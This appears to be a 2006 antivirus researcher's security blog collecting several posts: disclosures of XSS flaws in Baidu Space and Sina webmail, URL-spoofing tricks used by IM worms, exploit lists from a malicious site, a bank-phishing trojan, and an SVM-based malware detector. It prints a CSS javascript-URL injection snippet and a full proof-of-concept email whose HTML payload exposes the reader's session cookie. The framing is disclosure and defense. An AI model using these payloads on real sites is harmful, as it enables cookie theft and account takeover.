Baidu (Nasdaq: BIDU) launched its Blog service – Baidu Space Beta 10 days ago. It’s a blog system with no highlights at all, but I still moved my Chinese blog down there for better bandwidth and stability. Here’s an XSS vulnerability I found last Friday.

   1. Script injection

Baidu space allows users to change their spaces’ CSS freely, but the system does not filter any injected scripts out. For example, a CSS definition like “body { background:url(javascript:alert(‘hello’)); } ” will pop a message box. Users could inject any scripts into the CSS of their spaces. This is dangerous because bad guys can plate a trojan by injecting some exploits.

   2. The XSS attack

Baidu uses a cookie to tell whether a user has been logged on or not. The cookie’s domain is baidu.com. In other word, any script on baidu.com can obtain and use that cookie freely. Once you send some commands using the cookie stolen from a user, Baidu recognizes you as the victim himself. I’ll give a PoC below, which will add a friend link to your Friend List as long as you have a Baidu Space, and logged on.

Here’s the link, http://hi.baidu.com/somethingbad

And here’s the code I’ve injected to http://hi.baidu.com/somethingbad’s CSS,

#header{height:89px;background:url("javascript:document.body.onload = function(){

   3. Web 2.0 worm opportunity

The problem is actually quite similar to the Sammy case of MySpace. A web 2.0 worm could be accomplished based on such XSS vulnerabilities. With a slight modification, the codes could copy themselves to victim’s CSS, and hence, a worm comes into being.

Baidu did a fast response when their validate code algorithm got cracked. I hope it could do a great job too this time.

Liu Xiang breaks men’s 110m hurdles WR.

H D Moore opened the Browser Fun Blog on July 2nd. Here’s their welcome post,

“This blog will serve as a dumping ground for browser-based security research and vulnerability disclosure. To kick off this blog, we are announcing the Month of Browser Bugs (MoBB), where we will publish a new browser hack, every day, for the entire month of July. The hacks we publish are carefully chosen to demonstrate a concept without disclosing a direct path to remote code execution. Enjoy!”

So far, they’ve published 5 bugs. Affected browsers are IE, Firefox and Safari. See the bug list below,

• MoBB #5: DHTML setAttributeNode()
• MoBB #4: Mozilla Firefox DesignMode
• MoBB #3: OutlookExpress.AddressBook
• MoBB #2: Internet.HHCtrl Image Property
• MoBB #1: ADODB.Recordset Filter Property

The blog is really cool, but unfortunately, Chinese users just cannot access it directly since GFW banned the whole blogspot.com domain. Here’re 2 simple ways to bypass GFW,

1. Read the blog’s RSS in Bloglines.
2. Use a proxy server, or a proxy website such as hidemyass, or simply click here.

One of my colleagues told me that he found a suspicious post on MOP’s WoW forum last night. All hyperlinks inside the post pointed to the same URL, and when he clicked, IE lost response.

After studying on the source, I found that the inside links would lead users to a malicious site, which exploits 6 different critical flaws to install trojans. Here’s the misused flaw list,

• Real Player SMIL file handling buffer overflow (CAN-2005-0455)
• IE HHCtrl 'Related Topic' cross-zone code execution (MS05-001)
• IE OBJECT CODEBASE cross-zone code execution (MS02-015)
• IE MHTML ms-its cross-zone scripting (MS03-014)
• Windows WMF SetAbortProc code execution (MS06-001)
• IE createTextRange() buffer overflow (MS06-013)

Fortunately, vendors have issued patches for them all.

The to-be-installed trojans target 3 popular online games - World of Warcraft, Legend of Mir and Menghuan Xiyou. Around 530 players have read the phishing post in past 40 hours, and the number is still increasing.

Do not open the post shown below, and if you already did, run antivirus software with latest database immediately and change your password later.

A post of SecuriTeam Blogs leads me to a paper on how to defeat the “Great Firewall” of China. The paper explained how GFW works and issued a solution to beat it. It’s worth reading, and I hope some of you guys could download the paper before it gets banned.

We received a few variants of a phishing trojan which targets ICBC (Industrial and Commercial Bank of China) user accounts. Once launched, the trojan observes URL addresses opened by IE, and pops up a phishing dialog box when victim user tries to logon ICBC online bank. We have detected a dozen infections, the real number of victims may be multiplied times.

The phishing window, filled by a screenshot picture of the online bank web page with some hoax words, tries to persuade victim to submit his/her account password. Stolen information will be send to VXer through email. See the picture below (click it to view a large one),

Screenshooting is one of the most common methods used by phishing trojans. It’s easy to notice such trick if users click some controls on the window, e.g. dragging scrollbars.

A few days ago, I was a little bit worried that Yamanner worm would encourage hackers to find more vulnerabilities of Yahoo web services. Now the prediction comes true. A series of Proof of Concepts have been published on full-disclosure mailing-list today. Multiple Yahoo vulnerabilities were involved, including authentication bypass, session binding, cookie encoding security weakness and cross-site scripting. Yahoo got work to do.

Sina might have more work to do since its webmail security is even worse than Yahoo’s. I wrote a post discussing sina webmail’s problem a week ago. One of my friend blogged this in Chinese too. But nothing has been done to patch the hole. Maybe sina coders haven’t realized the critical authentication bypass flaw inside their webmail system. I hope some sina engineers could send the mail below to your own webmail account, open it in browser and see what happened,

Date: Mon, 12 Jun 2006 22:43:11 +0800
From: "Daishuo" <daishuo@jiangmin.com>
To: "somebody" <somebody@mail>
Subject: Cookie disclosure PoC of Sina Webmail
X-mailer: Foxmail 5.0 [cn]
Mime-Version: 1.0
Content-Type: multipart/alternative;
 boundary="=====003_Dragon577540504666_====="

This is a multi-part message in MIME format.

--=====003_Dragon577540504666_=====
Content-Type: text/plain;
 charset="gb2312"
Content-Transfer-Encoding: 7bit

this is a test.

--=====003_Dragon577540504666_=====
Content-Type: text/html;
 charset="gb2312"
Content-Transfer-Encoding: 7bit

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD></HEAD>
<BODY>
<IMG src="http://www.baidu.com/img/logo.gif"
onload="document.write(‘<BODY></BODY>’);document.body.innerText=document.cookie;"></IMG>
</BODY></HTML>

--=====003_Dragon577540504666_=====--

User cookie will be displayed in the mail body. And of course the cookie could be submitted to some guy’s database as well. Once we send a “GET” request to mail.sina.com.cn with one’s cookie, we can logon his account. And thus, an authentication bypass occurs.
Sina’d better read this post before hackers steal too may user cookies.

Something happened to Microsoft in the last week end, at least two of them are worth a mention here.

First, a new 0-day vulnerability of Excel was confirmed by MSRC last Saturday. The malicious sample was firstly reported on June 14, which was just the next day after Microsoft’s “patch Tuesday”. Technical details were not public. I don’t think MS will release an out-of-cycle patch for it. Excel will probably remain exploitable until July 11. Here’re some links about the 0-day,

Microsoft Excel 0-day Vulnerability FAQ

Reports of a new vulnerability in Microsoft Excel

New Excel zero-day flaw used in attacks

Second, Microsoft France was hacked. See the snapshot below (click it to view large pic)

TiTHacK, the hacker, was really active these days, and Microsoft.com is his/her next target. Is it another 0-day of Win2003+IIS6.0? Let’s wait and see.

Google cache has been blocked by China for years. And now, it seems reopened. This is really exciting :) Hope it’s not a temporary bug of GFW.

Google Spreadsheets has been released for a few days. I tried this latest service today. Basically it’s a simplified but *online* Excel application. I don’t think Google Spreadsheets is a threat against desktop Office, but it’s really a blow to Microsoft’s unborn Office Live.

Sharing and cooperation through web is what Google Spreadsheet focuses on. Users can invite people to view or edit their sheets by sending invitation emails. An editor can send messages to the viewer/editor group, and one’s modification will be seen by others instantly. Sharing is the key point that makes Google Spreadsheet different from Microsoft Excel.

Maybe I will write and share my wedding ceremony schedule using this cool service. So don’t feel strange if some of you receive my invitation sent from Google :)

Here’s an interesting method to bypass DNS resolution under Internet Explorer,

Step 1; right click on Desktop

Step 2; create a shortcut of notepad.exe

Step 3; name the shortcut as ‘www.microsoft.com’

Step 4; launch Internet Explorer and type ‘www.microsoft.com’ in the address bar

More info could be found here.

IM (Instant Messaging) worms are malwares that send messages through instant messaging applications such as MSN, ICQ, OICQ or AOL Messenger. The sent messages usually contain URLs that would lead receivers to malicious websites.

URL spoofing was an old trick used frequently by IM worms. Worm.Viking showed this to us again by sending the following URL through OICQ,

http://www.qq.com.search_2.shtml.cgi-client-entry.photo.39pic.com/qq%E5%83%8F%E5%86%8C4/

The address seems pointing to some page on www.qq.com at the first sight. www.qq.com is well known as the official website of OICQ, and hence is trusted by users. But the URL will actually open a malformed web page which tries to install the worm to visitor’s machine by exploiting MS05-001 and MS04-013. Observe carefully, and we’ll find out that the server name is www.qq.com.search_2.shtml.cgi-client-entry.photo.39pic.com, not www.qq.com.

Worm.Viking’s spoofing was a success, which helped Viking become the most popular worm of last week in China. This reminded me of other 2 common spoofing tricks used by IM worms.

The first one is to use redirecting scripts of well-known servers. For example, http://www.google.com/url?q=http://www.badguy.com leads to http://www.badguy.com. Equivalent URL with encoded destination is http://www.google.com/%75%72%6C%3F%71%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%64%67%75%79%2E%63%6F%6D

The other trick is to use password and username. Look at the example below,

http://www.google.com:8080@223408EDB32A.08E1F1AC275.CC

The URL will not connect port 8080 of www.google.com, instead, it will log on 223408EDB32A.08E1F1AC275.CC using ‘www.google.com’ as username and ‘8080’ as password.

Most IM users are cautious not to click strange URLs sent by others, but those looking official and innocent might be more dangerous. Hope this post help people survive the URL spoofing of IM worms.

I heard about the Devil’s Day by chance a few months ago. Western people believe that devils revive on June 6th of the 6th year of each century. And the Devil’s Day of this century, June 6th 2006, will come tomorrow.

It’s a marketing chance for entertainment producers, such as 20th Century Fox and its “The Omen”. It’s also a good chance, I believe, for virus writers to show their newest malwares off. Most virus writers love taking a meaningful day as the outbreak timer of their viruses. CIH used the author’s birthday – April 26, and many viruses break out on Black Fridays. The Devil’s Day seems more rare and valuable, since it happens once a hundred years. It’s almost for sure that some bad guys are considering themselves as awakening devils. We’d better prepare our systems for the coming hacks.

Brief Introduction

KVDetect is an application designed to find suspicious executables that might be malwares. I developed version 1.0 in Feb 2005. Other colleagues in R&D department added lots of cool features, such as BHO judgment and anti-rootkit, and finally the product was released as a component of proactive detection module in our antivirus software KV2005 and later.

Inside the program

To detect malwares, a knowledge base is necessary. KVDetect’s knowledge base consists of two parts – signature database and formula database. Signature database is a record set of signatures. Possible signatures are text strings, code fragments and suspicious behaviors. Engine is responsible to find matching result of each signature out of the target executable. A formula is actually an expression used to give the viral probability of the target. Formulas could be a combination of any supported operators and operands. Operands are signature matching results, immediate values or results of other formulas. Engine will calculate every formula, and finally result in the viral probability.

The problem

Knowledge base of KVDetect is completely given by human. Picking signatures is what virus analysts are good at. The real hard job is to determine good formulas. Before a nice formula was confirmed, we had to spend a few hours redefining operators and coefficients. But no matter how hard we worked, experiential formulas are always lack of supporting theories.

Improvement Opportunity

A support vector machine (SVM) might be a good solution of our formula problem. In SVM model, we need to give signatures and matching results only. After the training and refining procedures, a decision module will be constructed automatically. bluesky-Leon, who is doing his thesis design in our company, did some experiments on that. I provided him with 26 text strings as the signature database and 150 samples of Agobot variants. He used 120 samples to train and refine the SVM, and then, let SVM to pick remaining 30 Agobots among innocent files. SVM’s accuracy was 100%.

The testing result was really exciting. I believe that a much more intelligent version of KVDetect could be implemented based on SVM technology. Anyone who has suggestions, feel free to contact me :)